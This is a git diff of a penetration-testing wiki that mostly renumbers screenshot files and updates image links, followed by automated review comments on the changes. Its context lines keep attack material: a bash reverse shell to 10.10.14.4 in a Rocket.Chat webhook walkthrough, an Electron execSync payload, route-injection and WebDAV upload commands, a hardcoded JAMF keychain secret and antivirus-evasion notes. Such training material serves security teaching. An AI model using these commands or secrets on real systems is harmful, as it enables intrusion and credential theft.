diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png index 218780f0..3ae28122 100644 Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png index 248451f1..c7834192 100644 Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png index 4ede9266..a254c23a 100644 Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png deleted file mode 100644 index 0ef3cc20..00000000 Binary files a/.gitbook/assets/image (15).png and /dev/null differ diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png index 20ead5c0..e8b6b213 100644 Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ diff --git a/.gitbook/assets/image (17) (3).png b/.gitbook/assets/image (17) (3).png index 9b6db2a3..feabde2d 100644 Binary files a/.gitbook/assets/image (17) (3).png and b/.gitbook/assets/image (17) (3).png differ diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png index 77f2a896..9b6db2a3 100644 Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png index 3ae28122..c0008cb7 100644 Binary files a/.gitbook/assets/image (18).png and b/.gitbook/assets/image (18).png differ diff --git a/.gitbook/assets/image (19) (1).png b/.gitbook/assets/image (19) (1).png index 3305c860..ab835abd 100644 Binary files a/.gitbook/assets/image (19) (1).png and b/.gitbook/assets/image (19) (1).png differ 
diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png index c7834192..3305c860 100644 Binary files a/.gitbook/assets/image (19).png and b/.gitbook/assets/image (19).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (1) (2) (1).png new file mode 100644 index 00000000..c3ffd553 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (2).png b/.gitbook/assets/image (2) (1) (1) (2).png index c3ffd553..163b502d 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (2).png and b/.gitbook/assets/image (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png index 163b502d..eb7611c9 100644 Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index eb7611c9..4bb5f270 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 4bb5f270..ed57bd5f 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (20) (1).png b/.gitbook/assets/image (20) (1).png index e5d569d4..fc66de85 100644 Binary files a/.gitbook/assets/image (20) (1).png and b/.gitbook/assets/image (20) (1).png differ diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png index a254c23a..e5d569d4 100644 Binary files a/.gitbook/assets/image (20).png and b/.gitbook/assets/image (20).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png index 455fbb8b..eb57ea91 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png index eb57ea91..6874f9c8 100644 Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 6874f9c8..38b71f3d 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 38b71f3d..218780f0 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png new file mode 100644 index 00000000..2fde683e Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png index 2fde683e..6c4e73dc 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png index 6c4e73dc..0d4cd8ba 100644 Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index 0d4cd8ba..743e51c3 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 743e51c3..248451f1 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (2) (1).png b/.gitbook/assets/image (5) (1) (1) (2) (1).png new file mode 100644 index 00000000..5dc69a4e Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (2) (1).png differ 
diff --git a/.gitbook/assets/image (5) (1) (1) (2).png b/.gitbook/assets/image (5) (1) (1) (2).png index 5dc69a4e..114d3565 100644 Binary files a/.gitbook/assets/image (5) (1) (1) (2).png and b/.gitbook/assets/image (5) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png index 114d3565..4642e658 100644 Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png index 4642e658..4fbfba8c 100644 Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png index 4fbfba8c..4ede9266 100644 Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image (6) (2) (1).png b/.gitbook/assets/image (6) (2) (1).png new file mode 100644 index 00000000..5e036118 Binary files /dev/null and b/.gitbook/assets/image (6) (2) (1).png differ diff --git a/.gitbook/assets/image (6) (2).png b/.gitbook/assets/image (6) (2).png index 5e036118..345e6bee 100644 Binary files a/.gitbook/assets/image (6) (2).png and b/.gitbook/assets/image (6) (2).png differ diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png index 345e6bee..0ef3cc20 100644 Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ diff --git a/.gitbook/assets/image (7) (1) (3).png b/.gitbook/assets/image (7) (1) (3).png new file mode 100644 index 00000000..9a68acef Binary files /dev/null and b/.gitbook/assets/image (7) (1) (3).png differ diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png index 9a68acef..d990711a 100644 Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ 
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png index d990711a..20ead5c0 100644 Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png index ed57bd5f..77f2a896 100644 Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ diff --git a/backdoors/salseo.md b/backdoors/salseo.md index d98dbce9..21f0bc44 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio. #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** -![](<../.gitbook/assets/image (3) (1) (1) (1).png>) +![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>) #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** -![](<../.gitbook/assets/image (4) (1) (1) (1).png>) +![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>) In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** @@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor Press **Uninstall** (yeah, its weird but trust me, it is necessary) -![](<../.gitbook/assets/image (5) (1) (1) (2).png>) +![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) ### **Exit Visual Studio and execute DllExport\_configure** diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index c6aede60..fdcfd6a9 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -137,7 +137,7 @@ Arguments of the script: ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 ``` -
+
**Our host seems to be in trouble :)** diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md index 36887f55..3f5fc29a 100644 --- a/macos-hardening/macos-red-teaming/README.md +++ b/macos-hardening/macos-red-teaming/README.md @@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: -![](<../../.gitbook/assets/image (19).png>) +![](<../../.gitbook/assets/image (13).png>) #### JAMF device Authentication -
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** @@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and #### Secrets stealing -

a

+

a

You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. @@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: -
+
## References diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md index f8bd4db1..d12d0a87 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md @@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\ Like for example in this image (taken from the reference): -
+
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit: diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 6796980a..02009b0b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The * Going into **recovery mode** Kexts need to be **allowed to be loaded**: -
+
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed. * The Kext also needs to be **notarized**, Apple will be able to check it for malware. diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index c63f3ab5..23d5baf4 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -16,7 +16,7 @@ Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. -
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. @@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into ### Endpoint Security Framework Architecture -
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md index 8ba50531..9e8cd396 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md @@ -76,7 +76,7 @@ fat_magic FAT_MAGIC or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool: -
+
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch. @@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */ Example of **section header**: -
+
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC` -
+
It's also possible to get **headers information** from the **command line** with: diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index 0ad7001c..8de71d0c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/ {% endcode %} {% hint style="danger" %} -Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set. +Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set. However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes. {% endhint %} diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 1dad2256..5ec636d8 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -14,7 +14,7 @@ ## Sandbox loading process -

Image from http://newosxbook.com/files/HITSB.pdf

+

Image from http://newosxbook.com/files/HITSB.pdf

In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md index 6aa9757b..3a92811e 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md @@ -143,7 +143,7 @@ $> ls ~/Documents Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file: -
+
### CVE-2021-XXXX - Translocation @@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple). -
+
## Reference diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index a67a09b6..15e1f2d1 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP: -
+
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner. diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md index 1a169ddc..656d66b9 100644 --- a/network-services-pentesting/pentesting-web/put-method-webdav.md +++ b/network-services-pentesting/pentesting-web/put-method-webdav.md @@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every Output sample: -![](<../../.gitbook/assets/image (19) (1) (1).png>) +![](<../../.gitbook/assets/image (19) (1).png>) This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web. diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 64584b99..4aa91eb7 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") * Configure WebHook script: -
+
* Save changes * Get the generated WebHook URL: -
+
* Call it with curl and you shuold receive the rev shell diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 759ce057..0ef0b9a4 100644 --- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -206,7 +206,7 @@ The following will add a `Location` header to the response ``` -
+
#### CRLF in Add header (**CVE-2019-2438)** diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md index 4d219b62..62d377de 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md @@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo In the Burp's builtin browser go to the **Burp extension** and enable it: -
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:** -
+
### Inject a Canary @@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it: -
+
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**. diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md index f004a931..50831ea8 100644 --- a/todo/radio-hacking/flipper-zero/fz-ibutton.md +++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md @@ -24,7 +24,7 @@ For more info about what is an iButton check: The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**. -
+
## Actions diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md index 43169dff..777c8363 100644 --- a/todo/radio-hacking/ibutton.md +++ b/todo/radio-hacking/ibutton.md @@ -16,7 +16,7 @@ iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside. -
+
### What is iButton? diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md index 9ccdb082..1a415aad 100644 --- a/todo/radio-hacking/infrared.md +++ b/todo/radio-hacking/infrared.md @@ -32,7 +32,7 @@ IR protocols differ in 3 factors: Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant. -
+
**2. Pulse Width Encoding** diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md index 730a7f97..64d990a3 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates.md +++ b/windows-hardening/active-directory-methodology/ad-certificates.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). 
@@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry: -
+
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default. @@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). 
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md index fae40774..aa765ddf 100644 --- a/windows-hardening/av-bypass.md +++ b/windows-hardening/av-bypass.md @@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes -

Red Team VX Discord #malware-dev channel

+

Red Team VX Discord #malware-dev channel

As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something: @@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**. -
+
* **Inline** diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md index 3e6568da..e97e14a6 100644 --- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md +++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md @@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") { * **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**. * Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder: -
+
### Missed Dlls
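Review bot: the `.gitbook/assets` churn at the top of the patch is a chain of renumberings rather than simple edits (for example `image (3).png` now carries the blob that was `image (3) (1).png`, which in turn carries the former `image (3) (1) (1).png`, and `image (15).png` is deleted outright), yet only a handful of pages get their references updated (salseo.md, eigrp-attacks.md, macos-red-teaming/README.md, put-method-webdav.md and the figure hunks). Before merging, grep the repository for `image (15).png` and for each renumbered name to confirm no page still points at a moved or deleted screenshot, and spot-check that the new `image (13).png` reference in macos-red-teaming/README.md really is the JAMF brute-force form the surrounding sentence describes, since the old target was `image (19).png` and both `image (13).png` and `image (19).png` are rewritten in this same commit.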
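Review bot: in the macos-electron-applications-injection.md hunk the reworded hint reads as self-contradictory: it now says applications "with RunAsNode disabled" ignore node parameters "unless the env variable ELECTRON_RUN_AS_NODE is set", but disabling the RunAsNode fuse is exactly what makes that variable ignored, so the "unless" clause does not apply to the case the sentence describes. Suggest splitting it: state that with RunAsNode disabled ELECTRON_RUN_AS_NODE has no effect (and that `--inspect` is gated by its own fuse), and keep the ELECTRON_RUN_AS_NODE caveat only for builds where the fuse is still enabled; the following sentence about `--remote-debugging-port=9229` can stay as is.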
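Review bot: the two ad-certificates.md hunks change only `hacktricks_live` to `hacktricks\_live` inside a link destination of the sponsor banner that is duplicated at the top and bottom of the page. CommonMark unescapes `\_` in link destinations, so the rendered URL is unchanged and this is pure GitBook auto-escaping noise; as a style point, such mechanical escaping churn is better kept in its own commit so the real content edits (the salseo.md image swap and the Electron hint rewording) are easier to spot in review.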